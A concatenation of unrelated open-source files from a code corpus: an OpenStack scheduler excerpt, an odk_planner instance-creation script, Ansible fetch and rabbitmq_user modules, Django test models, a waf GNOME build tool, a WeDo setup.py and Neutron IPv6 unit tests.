driver.cast_to_compute_host(context, host.host_state.host,
'prep_resize', **kwargs)
def _provision_resource(self, context, weighted_host, request_spec,
kwargs):
"""Create the requested resource in this Zone."""
instance = self.create_instance_db_entry(context, request_spec)
payload = dict(request_spec=request_spec,
weighted_host=weighted_host.to_dict(),
instance_id=instance['uuid'])
notifier.notify(notifier.publisher_id("scheduler"),
'scheduler.run_instance.scheduled', notifier.INFO,
payload)
driver.cast_to_compute_host(context, weighted_host.host_state.host,
'run_instance', instance_uuid=instance['uuid'], **kwargs)
inst = driver.encode_instance(instance, local=True)
# So if another instance is created, create_instance_db_entry will
# actually create a new entry, instead of assuming it's been created
# already
del request_spec['instance_properties']['uuid']
return inst
def _get_configuration_options(self):
"""Fetch options dictionary. Broken out for testing."""
return self.options.get_configuration()
def populate_filter_properties(self, request_spec, filter_properties):
"""Stuff things into filter_properties. Can be overriden in a
subclass to add more data.
"""
pass
def _schedule(self, context, topic, request_spec, *args, **kwargs):
"""Returns a list of hosts that meet the required specs,
ordered by their fitness.
"""
elevated = context.elevated()
if topic != "compute":
msg = _("Scheduler only understands Compute nodes (for now)")
raise NotImplementedError(msg)
instance_properties = request_spec['instance_properties']
instance_type = request_spec.get("instance_type", None)
cost_functions = self.get_cost_functions()
config_options = self._get_configuration_options()
filter_properties = kwargs.get('filter_properties', {})
filter_properties.update({'context': context,
'request_spec': request_spec,
'config_options': config_options,
'instance_type': instance_type})
#Eneabegin
LOG.debug(_('Enea: attributes of filter_properties in _schedule: %(attributi)s'),
{'attributi': filter_properties.__getattribute__})
#Eneaend
self.populate_filter_properties(request_spec,
filter_properties)
# Find our local list of acceptable hosts by repeatedly
# filtering and weighing our options. Each time we choose a
# host, we virtually consume resources on it so subsequent
# selections can adjust accordingly.
# unfiltered_hosts_dict is {host : ZoneManager.HostInfo()}
unfiltered_hosts_dict = self.host_manager.get_all_host_states(
elevated, topic)
# Note: remember, we are using an iterator here. So only
# traverse this list once. This can bite you if the hosts
# are being scanned in a filter or weighing function.
hosts = unfiltered_hosts_dict.itervalues()
num_instances = request_spec.get('num_instances', 1)
selected_hosts = []
for num in xrange(num_instances):
# Filter local hosts based on requirements ...
hosts = self.host_manager.filter_hosts(hosts,
filter_properties)
if not hosts:
# Can't get any more locally.
break
LOG.debug(_("Filtered %(hosts)s") % locals())
# weighted_host = WeightedHost() ... the best
# host for the job.
# TODO(comstud): filter_properties will also be used for
# weighing and I plan to fold weighing into the host manager
# in a future patch. I'll address the naming of this
# variable at that time.
#Eneabegin
LOG.debug(_("Enea: property of host %(hosts)s") % locals())
#Eneaend
weighted_host = least_cost.weighted_sum(cost_functions,
hosts, filter_properties)
LOG.debug(_("Weighted %(weighted_host)s") % locals())
selected_hosts.append(weighted_host)
# Now consume the resources so the filter/weights
# will change for the next instance.
weighted_host.host_state.consume_from_instance(
instance_properties)
selected_hosts.sort(key=operator.attrgetter('weight'))
#Enea_begin
if selected_hosts:
LOG.debug(_('Enea: First weight host: %(weight)s and selected hosts: %(selected_hosts)s and host_state[0]: %(attribute)s'),
{'selected_hosts': selected_hosts,
'attribute': selected_hosts[0].__getattribute__,
'weight': selected_hosts[0].weight})
#Enea_end
return selected_hosts[:num_instances]
def get_cost_functions(self, topic=None):
"""Returns a list of tuples containing weights and cost functions to
use for weighing hosts
"""
if topic is None:
# Schedulers only support compute right now.
topic = "compute"
if topic in self.cost_function_cache:
return self.cost_function_cache[topic]
cost_fns = []
for cost_fn_str in FLAGS.least_cost_functions:
if '.' in cost_fn_str:
short_name = cost_fn_str.split('.')[-1]
else:
short_name = cost_fn_str
cost_fn_str = "%s.%s.%s" % (
__name__, self.__class__.__name__, short_name)
if not (short_name.startswith('%s_' % topic) or
short_name.startswith('noop')):
continue
try:
# NOTE: import_class is somewhat misnamed since
# the weighing function can be any non-class callable
# (i.e., no 'self')
cost_fn = utils.import_class(cost_fn_str)
except exception.ClassNotFound:
raise exception.SchedulerCostFunctionNotFound(
cost_fn_str=cost_fn_str)
try:
flag_name = "%s_weight" % cost_fn.__name__
weight = getattr(FLAGS, flag_name)
except AttributeError:
raise exception.SchedulerWeightFlagNotFound(
flag_name=flag_name)
cost_fns.append((weight, cost_fn))
self.cost_function_cache[topic] = cost_fns
return cost_fns
|
apache-2.0
|
SwissTPH/odk_planner
|
tools/create_instance.py
|
1
|
3752
|
"""Creates a new instance with default configuration files
this script creates a new instance with the default configuration files from
the ``demo/config`` directory, asking the user for MySQL credentials, and
also creating a temporary password that has to be used for first login
"""
import sys, ConfigParser, os, os.path, string, shutil, random
if len(sys.argv) > 2 or sum([arg.startswith('-') for arg in sys.argv[1:]]):
print('\nusage:\n %s [template.ini]\n' % sys.argv[0])
sys.exit(-1)
def ask(question, default=None):
if default is None:
return raw_input(question)
else:
ret = raw_input(question + ' [%s] ' % default)
if ret:
return ret
else:
return default
def askchoice(question, choices):
while True:
answer = raw_input(question + ' (%s) ' % ','.join(choices))
if answer in choices: return answer
def askyn(question):
return askchoice(question, ('y', 'n')) == 'y'
def makepass(length):
chars = string.letters + string.digits
return ''.join([random.choice(chars) for i in range(length)])
demodir = os.path.join(os.path.dirname(__file__), os.path.pardir, 'test', 'demo')
configdir = os.path.join(demodir, 'config')
xlssrc = os.path.join(configdir, 'config-sample.xls')
inisrc = os.path.join(configdir, 'config-sample.ini')
instancedir = os.path.join(demodir, os.path.pardir, os.path.pardir, 'instances')
# set umask to generate files with group write access
os.umask(2)
# preparse ini
cp = ConfigParser.RawConfigParser()
if len(sys.argv) > 1:
if not os.path.exists(sys.argv[1]):
print('\n*** cannot open "%s"\n' % sys.argv[1])
sys.exit(-2)
inisrc = sys.argv[1]
cp.read(inisrc)
# ask information, check instance does not exist yet
print('''
this script will create a new odk_planner instance
--------------------------------------------------
''')
instance_name = ask('instance name: ')
instance_root = os.path.join(instancedir, instance_name)
if os.path.exists(instance_root):
print('CANNOT CREATE instance with name "%s" : path "%s" exists already!' %
(instance_name, instance_root))
raw_input('press <ENTER> to continue...')
sys.exit(-1)
os.mkdir(instance_root)
# modify config settings
for section in cp.sections():
print(section + '\n' + '-' * len(section))
for name, value in cp.items(section):
value = ask(' - ' + name, cp.get(section, name))
if ' ' in value and not (
value.startswith('"') and value.endswith('"')):
value = '"%s"' % value
cp.set(section, name, value)
# create directories
for subdir in ('config', 'log', 'forms'):
os.mkdir(os.path.join(instance_root, subdir))
# copy config files
xlsdst = os.path.join(instance_root, 'config', 'config.xls')
inidst = os.path.join(instance_root, 'config', 'config.ini')
cp.write(file(inidst, 'w'))
shutil.copyfile(xlssrc, xlsdst)
# try setting group id
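# os.chown with uid -1 leaves the file owner unchanged and only changes the
# group, so everything under the new instance inherits the group of instances/.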
st = os.stat(instancedir)
os.chown(instance_root, -1, st.st_gid)
for root, dirs, files in os.walk(instance_root):
for leaf in dirs + files:
os.chown(os.path.join(root, leaf), -1, st.st_gid)
# generate temporary password
passpath = os.path.join(instance_root, 'config', 'TMPPASS')
tmppass = makepass(8)
file(passpath, 'w').write(tmppass)
# output to user
print('''
generated new instance:
- name: {instance_name}
- temporary password: {tmppass}
make sure that the directory "instances/{instance_name}/" and all its contents are
writable by the apache user (this should automatically be the case if the
directory "instances/" has the right group ownership)
'''.format(
instance_name=instance_name, tmppass=tmppass))
raw_input('press <ENTER> to continue...')
|
gpl-2.0
|
v0lk3r/ansible-modules-core
|
files/fetch.py
|
94
|
3057
|
# this is a virtual module that is entirely implemented server side
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: fetch
short_description: Fetches a file from remote nodes
description:
- This module works like M(copy), but in reverse. It is used for fetching
files from remote machines and storing them locally in a file tree,
organized by hostname. Note that this module is written to transfer
log files that might not be present, so a missing remote file won't
be an error unless fail_on_missing is set to 'yes'.
version_added: "0.2"
options:
src:
description:
- The file on the remote system to fetch. This I(must) be a file, not a
directory. Recursive fetching may be supported in a later release.
required: true
default: null
aliases: []
dest:
description:
- A directory to save the file into. For example, if the I(dest)
directory is C(/backup), a I(src) file named C(/etc/profile) on host
C(host.example.com) would be saved into
C(/backup/host.example.com/etc/profile)
required: true
default: null
fail_on_missing:
version_added: "1.1"
description:
- Makes the task fail when the source file is missing.
required: false
choices: [ "yes", "no" ]
default: "no"
validate_checksum:
version_added: "1.4"
description:
- Verify that the source and destination checksums match after the files are fetched.
required: false
choices: [ "yes", "no" ]
default: "yes"
aliases: [ "validate_md5" ]
flat:
version_added: "1.2"
description:
- Allows you to override the default behavior of appending
hostname/path/to/file to the destination. If dest ends with '/', it
will use the basename of the source file, similar to the copy module.
Obviously this is only handy if the filenames are unique.
requirements: []
author:
- "Ansible Core Team"
- "Michael DeHaan"
'''
EXAMPLES = '''
# Store file into /tmp/fetched/host.example.com/tmp/somefile
- fetch: src=/tmp/somefile dest=/tmp/fetched
# Specifying a path directly
- fetch: src=/tmp/somefile dest=/tmp/prefix-{{ ansible_hostname }} flat=yes
# Specifying a destination path
- fetch: src=/tmp/uniquefile dest=/tmp/special/ flat=yes
# Storing in a path relative to the playbook
- fetch: src=/tmp/uniquefile dest=special/prefix-{{ ansible_hostname }} flat=yes
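# Illustrative addition (hypothetical paths): treat a missing remote file as an error
- fetch: src=/var/log/app.log dest=/tmp/fetched fail_on_missing=yes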
'''
|
gpl-3.0
|
blindroot/django
|
tests/admin_widgets/models.py
|
49
|
4830
|
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class MyFileField(models.FileField):
pass
@python_2_unicode_compatible
class Member(models.Model):
name = models.CharField(max_length=100)
birthdate = models.DateTimeField(blank=True, null=True)
gender = models.CharField(max_length=1, blank=True, choices=[('M', 'Male'), ('F', 'Female')])
email = models.EmailField(blank=True)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Band(models.Model):
name = models.CharField(max_length=100)
style = models.CharField(max_length=20)
members = models.ManyToManyField(Member)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Album(models.Model):
band = models.ForeignKey(Band, models.CASCADE)
name = models.CharField(max_length=100)
cover_art = models.FileField(upload_to='albums')
backside_art = MyFileField(upload_to='albums_back', null=True)
def __str__(self):
return self.name
class HiddenInventoryManager(models.Manager):
def get_queryset(self):
return super(HiddenInventoryManager, self).get_queryset().filter(hidden=False)
@python_2_unicode_compatible
class Inventory(models.Model):
barcode = models.PositiveIntegerField(unique=True)
parent = models.ForeignKey('self', models.SET_NULL, to_field='barcode', blank=True, null=True)
name = models.CharField(blank=False, max_length=20)
hidden = models.BooleanField(default=False)
# see #9258
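# The plain Manager is declared first so it becomes the model's default
# manager (hidden rows stay reachable), while `objects` filters them out.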
default_manager = models.Manager()
objects = HiddenInventoryManager()
def __str__(self):
return self.name
class Event(models.Model):
main_band = models.ForeignKey(
Band,
models.CASCADE,
limit_choices_to=models.Q(pk__gt=0),
related_name='events_main_band_at',
)
supporting_bands = models.ManyToManyField(
Band,
blank=True,
related_name='events_supporting_band_at',
help_text='Supporting Bands.',
)
start_date = models.DateField(blank=True, null=True)
start_time = models.TimeField(blank=True, null=True)
description = models.TextField(blank=True)
link = models.URLField(blank=True)
min_age = models.IntegerField(blank=True, null=True)
@python_2_unicode_compatible
class Car(models.Model):
owner = models.ForeignKey(User, models.CASCADE)
make = models.CharField(max_length=30)
model = models.CharField(max_length=30)
def __str__(self):
return "%s %s" % (self.make, self.model)
class CarTire(models.Model):
"""
A single car tire. This is to test that a user can only select their own cars.
"""
car = models.ForeignKey(Car, models.CASCADE)
class Honeycomb(models.Model):
location = models.CharField(max_length=20)
class Bee(models.Model):
"""
A model with a FK to a model that won't be registered with the admin
(Honeycomb) so the corresponding raw ID widget won't have a magnifying
glass link to select related honeycomb instances.
"""
honeycomb = models.ForeignKey(Honeycomb, models.CASCADE)
class Individual(models.Model):
"""
A model with a FK to itself. It won't be registered with the admin, so the
corresponding raw ID widget won't have a magnifying glass link to select
related instances (rendering will be called programmatically in this case).
"""
name = models.CharField(max_length=20)
parent = models.ForeignKey('self', models.SET_NULL, null=True)
soulmate = models.ForeignKey('self', models.CASCADE, null=True, related_name='soulmates')
class Company(models.Model):
name = models.CharField(max_length=20)
class Advisor(models.Model):
"""
A model with a m2m to a model that won't be registered with the admin
(Company) so the corresponding raw ID widget won't have a magnifying
glass link to select related company instances.
"""
name = models.CharField(max_length=20)
companies = models.ManyToManyField(Company)
@python_2_unicode_compatible
class Student(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
class Meta:
ordering = ('name',)
@python_2_unicode_compatible
class School(models.Model):
name = models.CharField(max_length=255)
students = models.ManyToManyField(Student, related_name='current_schools')
alumni = models.ManyToManyField(Student, related_name='previous_schools')
def __str__(self):
return self.name
@python_2_unicode_compatible
class Profile(models.Model):
user = models.ForeignKey('auth.User', models.CASCADE, to_field='username')
def __str__(self):
return self.user.username
|
bsd-3-clause
|
coolblaze03/WSNNS3Port
|
.waf-1.5.16-e6d03192b5ddfa5ef2c8d65308e48e42/wafadmin/Tools/gnome.py
|
6
|
6844
|
#! /usr/bin/env python
# encoding: utf-8
import os,re
import TaskGen,Utils,Runner,Task,Build,Options,Logs
import cc
from Logs import error
from TaskGen import taskgen,before,after,feature
n1_regexp=re.compile('<refentrytitle>(.*)</refentrytitle>',re.M)
n2_regexp=re.compile('<manvolnum>(.*)</manvolnum>',re.M)
def postinstall_schemas(prog_name):
if Build.bld.is_install:
dir=Build.bld.get_install_path('${PREFIX}/etc/gconf/schemas/%s.schemas'%prog_name)
if not Options.options.destdir:
Utils.pprint('YELLOW','Installing GConf schema')
command='gconftool-2 --install-schema-file=%s 1> /dev/null'%dir
ret=Utils.exec_command(command)
else:
Utils.pprint('YELLOW','GConf schema not installed. After install, run this:')
Utils.pprint('YELLOW','gconftool-2 --install-schema-file=%s'%dir)
def postinstall_icons():
dir=Build.bld.get_install_path('${DATADIR}/icons/hicolor')
if Build.bld.is_install:
if not Options.options.destdir:
Utils.pprint('YELLOW',"Updating Gtk icon cache.")
command='gtk-update-icon-cache -q -f -t %s'%dir
ret=Utils.exec_command(command)
else:
Utils.pprint('YELLOW','Icon cache not updated. After install, run this:')
Utils.pprint('YELLOW','gtk-update-icon-cache -q -f -t %s'%dir)
def postinstall_scrollkeeper(prog_name):
if Build.bld.is_install:
if os.access('/var/log/scrollkeeper.log',os.W_OK):
dir1=Build.bld.get_install_path('${PREFIX}/var/scrollkeeper')
dir2=Build.bld.get_install_path('${DATADIR}/omf/%s'%prog_name)
command='scrollkeeper-update -q -p %s -o %s'%(dir1,dir2)
ret=Utils.exec_command(command)
def postinstall(prog_name='myapp',schemas=1,icons=1,scrollkeeper=1):
if schemas:postinstall_schemas(prog_name)
if icons:postinstall_icons()
if scrollkeeper:postinstall_scrollkeeper(prog_name)
class gnome_doc_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def init_gnome_doc(self):
self.default_install_path='${PREFIX}/share'
def apply_gnome_doc(self):
self.env['APPNAME']=self.doc_module
lst=self.to_list(self.doc_linguas)
bld=self.bld
lst.append('C')
for x in lst:
if not x=='C':
tsk=self.create_task('xml2po')
node=self.path.find_resource(x+'/'+x+'.po')
src=self.path.find_resource('C/%s.xml'%self.doc_module)
out=self.path.find_or_declare('%s/%s.xml'%(x,self.doc_module))
tsk.set_inputs([node,src])
tsk.set_outputs(out)
else:
out=self.path.find_resource('%s/%s.xml'%(x,self.doc_module))
tsk2=self.create_task('xsltproc2po')
out2=self.path.find_or_declare('%s/%s-%s.omf'%(x,self.doc_module,x))
tsk2.set_outputs(out2)
node=self.path.find_resource(self.doc_module+".omf.in")
tsk2.inputs=[node,out]
tsk2.run_after.append(tsk)
if bld.is_install:
path=self.install_path+'/gnome/help/%s/%s'%(self.doc_module,x)
bld.install_files(self.install_path+'/omf',out2,env=self.env)
for y in self.to_list(self.doc_figures):
try:
os.stat(self.path.abspath()+'/'+x+'/'+y)
bld.install_as(path+'/'+y,self.path.abspath()+'/'+x+'/'+y)
except:
bld.install_as(path+'/'+y,self.path.abspath()+'/C/'+y)
bld.install_as(path+'/%s.xml'%self.doc_module,out.abspath(self.env))
if x=='C':
xmls=self.to_list(self.doc_includes)
xmls.append(self.doc_entities)
for z in xmls:
out=self.path.find_resource('%s/%s'%(x,z))
bld.install_as(path+'/%s'%z,out.abspath(self.env))
class xml_to_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def init_xml_to(self):
Utils.def_attrs(self,source='xmlfile',xslt='xlsltfile',target='hey',default_install_path='${PREFIX}',task_created=None)
def apply_xml_to(self):
xmlfile=self.path.find_resource(self.source)
xsltfile=self.path.find_resource(self.xslt)
tsk=self.create_task('xmlto',[xmlfile,xsltfile],xmlfile.change_ext('html'))
tsk.install_path=self.install_path
def sgml_scan(self):
node=self.inputs[0]
env=self.env
variant=node.variant(env)
fi=open(node.abspath(env),'r')
content=fi.read()
fi.close()
name=n1_regexp.findall(content)[0]
num=n2_regexp.findall(content)[0]
doc_name=name+'.'+num
if not self.outputs:
self.outputs=[self.generator.path.find_or_declare(doc_name)]
return([],[doc_name])
class gnome_sgml2man_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def apply_gnome_sgml2man(self):
assert(getattr(self,'appname',None))
def install_result(task):
out=task.outputs[0]
name=out.name
ext=name[-1]
env=task.env
self.bld.install_files('${DATADIR}/man/man%s/'%ext,out,env)
self.bld.rescan(self.path)
for name in self.bld.cache_dir_contents[self.path.id]:
base,ext=os.path.splitext(name)
if ext!='.sgml':continue
task=self.create_task('sgml2man')
task.set_inputs(self.path.find_resource(name))
task.task_generator=self
if self.bld.is_install:task.install=install_result
task.scan()
cls=Task.simple_task_type('sgml2man','${SGML2MAN} -o ${TGT[0].bld_dir(env)} ${SRC} > /dev/null',color='BLUE')
cls.scan=sgml_scan
cls.quiet=1
Task.simple_task_type('xmlto','${XMLTO} html -m ${SRC[1].abspath(env)} ${SRC[0].abspath(env)}')
Task.simple_task_type('xml2po','${XML2PO} ${XML2POFLAGS} ${SRC} > ${TGT}',color='BLUE')
xslt_magic="""${XSLTPROC2PO} -o ${TGT[0].abspath(env)} \
--stringparam db2omf.basename ${APPNAME} \
--stringparam db2omf.format docbook \
--stringparam db2omf.lang ${TGT[0].abspath(env)[:-4].split('-')[-1]} \
--stringparam db2omf.dtd '-//OASIS//DTD DocBook XML V4.3//EN' \
--stringparam db2omf.omf_dir ${PREFIX}/share/omf \
--stringparam db2omf.help_dir ${PREFIX}/share/gnome/help \
--stringparam db2omf.omf_in ${SRC[0].abspath(env)} \
--stringparam db2omf.scrollkeeper_cl ${SCROLLKEEPER_DATADIR}/Templates/C/scrollkeeper_cl.xml \
${DB2OMF} ${SRC[1].abspath(env)}"""
Task.simple_task_type('xsltproc2po',xslt_magic,color='BLUE')
def detect(conf):
conf.check_tool('gnu_dirs glib2 dbus')
sgml2man=conf.find_program('docbook2man',var='SGML2MAN')
def getstr(varname):
return getattr(Options.options,varname,'')
conf.define('GNOMELOCALEDIR',os.path.join(conf.env['DATADIR'],'locale'))
xml2po=conf.find_program('xml2po',var='XML2PO')
xsltproc2po=conf.find_program('xsltproc',var='XSLTPROC2PO')
conf.env['XML2POFLAGS']='-e -p'
conf.env['SCROLLKEEPER_DATADIR']=Utils.cmd_output("scrollkeeper-config --pkgdatadir",silent=1).strip()
conf.env['DB2OMF']=Utils.cmd_output("/usr/bin/pkg-config --variable db2omf gnome-doc-utils",silent=1).strip()
def set_options(opt):
opt.add_option('--want-rpath',type='int',default=1,dest='want_rpath',help='set rpath to 1 or 0 [Default 1]')
feature('gnome_doc')(init_gnome_doc)
feature('gnome_doc')(apply_gnome_doc)
after('init_gnome_doc')(apply_gnome_doc)
feature('xml_to')(init_xml_to)
feature('xml_to')(apply_xml_to)
after('init_xml_to')(apply_xml_to)
feature('gnome_sgml2man')(apply_gnome_sgml2man)
|
gpl-2.0
|
bregman-arie/ansible
|
lib/ansible/modules/messaging/rabbitmq_user.py
|
15
|
9514
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Chatham Financial <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rabbitmq_user
short_description: Adds or removes RabbitMQ users
description:
- Add or remove RabbitMQ users and assign permissions
version_added: "1.1"
author: '"Chris Hoffman (@chrishoffman)"'
options:
user:
description:
- Name of user to add
required: true
aliases: [username, name]
password:
description:
- Password of user to add.
- To change the password of an existing user, you must also specify
C(force=yes).
tags:
description:
- User tags, specified as a comma-delimited string
permissions:
description:
- A list of dicts; each dict contains vhost, configure_priv, write_priv, and read_priv,
and represents a permission rule for that vhost.
- Prefer this option when you want to manage all of the user's permissions.
- Use the vhost, configure_priv, write_priv, and read_priv options instead
if you only care about permissions for some vhosts.
default: []
vhost:
description:
- vhost to apply access privileges to.
- This option will be ignored when permissions option is used.
default: /
node:
description:
- Erlang node name of the RabbitMQ node we wish to configure
default: rabbit
version_added: "1.2"
configure_priv:
description:
- Regular expression to restrict configure actions on a resource
for the specified vhost.
- By default all actions are restricted.
- This option will be ignored when permissions option is used.
default: ^$
write_priv:
description:
- Regular expression to restrict write actions on a resource
for the specified vhost.
- By default all actions are restricted.
- This option will be ignored when permissions option is used.
default: ^$
read_priv:
description:
- Regular expression to restrict read actions on a resource
for the specified vhost.
- By default all actions are restricted.
- This option will be ignored when permissions option is used.
default: ^$
force:
description:
- Deletes and recreates the user.
type: bool
default: 'no'
state:
description:
- Specify if the user is to be added or removed
default: present
choices: [present, absent]
'''
EXAMPLES = '''
# Add user to server and assign full access control on / vhost.
# The user might have permission rules for other vhost but you don't care.
- rabbitmq_user:
user: joe
password: changeme
vhost: /
configure_priv: .*
read_priv: .*
write_priv: .*
state: present
# Add user to server and assign full access control on / vhost.
# The user doesn't have permission rules for other vhosts
- rabbitmq_user:
user: joe
password: changeme
permissions:
- vhost: /
configure_priv: .*
read_priv: .*
write_priv: .*
state: present
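# Illustrative addition: remove the user again, using the documented 'absent'
# state choice
- rabbitmq_user:
user: joe
state: absent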
'''
from ansible.module_utils.basic import AnsibleModule
class RabbitMqUser(object):
def __init__(self, module, username, password, tags, permissions,
node, bulk_permissions=False):
self.module = module
self.username = username
self.password = password
self.node = node
if not tags:
self.tags = list()
else:
self.tags = tags.split(',')
self.permissions = permissions
self.bulk_permissions = bulk_permissions
self._tags = None
self._permissions = []
self._rabbitmqctl = module.get_bin_path('rabbitmqctl', True)
def _exec(self, args, run_in_check_mode=False):
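# In check mode only calls that pass run_in_check_mode=True (the read-only
# list_* queries) actually run; mutating commands return an empty list.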
if not self.module.check_mode or run_in_check_mode:
cmd = [self._rabbitmqctl, '-q']
if self.node is not None:
cmd.extend(['-n', self.node])
rc, out, err = self.module.run_command(cmd + args, check_rc=True)
return out.splitlines()
return list()
def get(self):
users = self._exec(['list_users'], True)
for user_tag in users:
if '\t' not in user_tag:
continue
user, tags = user_tag.split('\t')
if user == self.username:
for c in ['[', ']', ' ']:
tags = tags.replace(c, '')
if tags != '':
self._tags = tags.split(',')
else:
self._tags = list()
self._permissions = self._get_permissions()
return True
return False
def _get_permissions(self):
perms_out = self._exec(['list_user_permissions', self.username], True)
perms_list = list()
for perm in perms_out:
vhost, configure_priv, write_priv, read_priv = perm.split('\t')
if not self.bulk_permissions:
if vhost == self.permissions[0]['vhost']:
perms_list.append(dict(vhost=vhost, configure_priv=configure_priv,
write_priv=write_priv, read_priv=read_priv))
break
else:
perms_list.append(dict(vhost=vhost, configure_priv=configure_priv,
write_priv=write_priv, read_priv=read_priv))
return perms_list
def add(self):
if self.password is not None:
self._exec(['add_user', self.username, self.password])
else:
self._exec(['add_user', self.username, ''])
self._exec(['clear_password', self.username])
def delete(self):
self._exec(['delete_user', self.username])
def set_tags(self):
self._exec(['set_user_tags', self.username] + self.tags)
def set_permissions(self):
for permission in self._permissions:
if permission not in self.permissions:
cmd = ['clear_permissions', '-p']
cmd.append(permission['vhost'])
cmd.append(self.username)
self._exec(cmd)
for permission in self.permissions:
if permission not in self._permissions:
cmd = ['set_permissions', '-p']
cmd.append(permission['vhost'])
cmd.append(self.username)
cmd.append(permission['configure_priv'])
cmd.append(permission['write_priv'])
cmd.append(permission['read_priv'])
self._exec(cmd)
def has_tags_modifications(self):
return set(self.tags) != set(self._tags)
def has_permissions_modifications(self):
return sorted(self._permissions) != sorted(self.permissions)
def main():
arg_spec = dict(
user=dict(required=True, aliases=['username', 'name']),
password=dict(default=None, no_log=True),
tags=dict(default=None),
permissions=dict(default=list(), type='list'),
vhost=dict(default='/'),
configure_priv=dict(default='^$'),
write_priv=dict(default='^$'),
read_priv=dict(default='^$'),
force=dict(default='no', type='bool'),
state=dict(default='present', choices=['present', 'absent']),
node=dict(default=None)
)
module = AnsibleModule(
argument_spec=arg_spec,
supports_check_mode=True
)
username = module.params['user']
password = module.params['password']
tags = module.params['tags']
permissions = module.params['permissions']
vhost = module.params['vhost']
configure_priv = module.params['configure_priv']
write_priv = module.params['write_priv']
read_priv = module.params['read_priv']
force = module.params['force']
state = module.params['state']
node = module.params['node']
bulk_permissions = True
if not permissions:
perm = {
'vhost': vhost,
'configure_priv': configure_priv,
'write_priv': write_priv,
'read_priv': read_priv
}
permissions.append(perm)
bulk_permissions = False
rabbitmq_user = RabbitMqUser(module, username, password, tags, permissions,
node, bulk_permissions=bulk_permissions)
result = dict(changed=False, user=username, state=state)
if rabbitmq_user.get():
if state == 'absent':
rabbitmq_user.delete()
result['changed'] = True
else:
if force:
rabbitmq_user.delete()
rabbitmq_user.add()
rabbitmq_user.get()
result['changed'] = True
if rabbitmq_user.has_tags_modifications():
rabbitmq_user.set_tags()
result['changed'] = True
if rabbitmq_user.has_permissions_modifications():
rabbitmq_user.set_permissions()
result['changed'] = True
elif state == 'present':
rabbitmq_user.add()
rabbitmq_user.set_tags()
rabbitmq_user.set_permissions()
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
itdaniher/WeDoMore
|
setup.py
|
1
|
1174
|
#!/usr/bin/env python
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='wedo',
version='1.1.0',
packages=find_packages(),
install_requires=['pyusb'],
zip_safe=False,
include_package_data=True,
author="Guillaume BINET",
author_email="[email protected]",
description="This is a python library for the Lego WeDo, a tethered-over-USB sensing and robotics toolkit produced by Lego for the educational market.",
long_description=''.join([read('README.rst'), '\n\n', read('CHANGES.rst')]),
license="GPL",
keywords="lego wedo motor tilt sensor driver",
url="https://github.com/gbin/WeDoMore",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Education",
"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2"]
)
|
gpl-2.0
|
mandeepdhami/neutron
|
neutron/tests/unit/common/test_ipv6_utils.py
|
24
|
5641
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
from neutron.common import constants
from neutron.common import ipv6_utils
from neutron.tests import base
class IPv6byEUI64TestCase(base.BaseTestCase):
"""Unit tests for generate IPv6 by EUI-64 operations."""
def test_generate_IPv6_by_EUI64(self):
addr = ipv6_utils.get_ipv6_addr_by_EUI64('2001:db8::',
'00:16:3e:33:44:55')
self.assertEqual('2001:db8::216:3eff:fe33:4455', addr.format())
def test_generate_IPv6_with_IPv4_prefix(self):
ipv4_prefix = '10.0.8'
mac = '00:16:3e:33:44:55'
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(ipv4_prefix, mac))
def test_generate_IPv6_with_bad_mac(self):
bad_mac = '00:16:3e:33:44:5Z'
prefix = '2001:db8::'
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(prefix, bad_mac))
def test_generate_IPv6_with_bad_prefix(self):
mac = '00:16:3e:33:44:55'
bad_prefix = 'bb'
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(bad_prefix, mac))
def test_generate_IPv6_with_error_prefix_type(self):
mac = '00:16:3e:33:44:55'
prefix = 123
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(prefix, mac))
class TestIsEnabled(base.BaseTestCase):
def setUp(self):
super(TestIsEnabled, self).setUp()
def reset_detection_flag():
ipv6_utils._IS_IPV6_ENABLED = None
reset_detection_flag()
self.addCleanup(reset_detection_flag)
self.mock_exists = mock.patch("os.path.exists",
return_value=True).start()
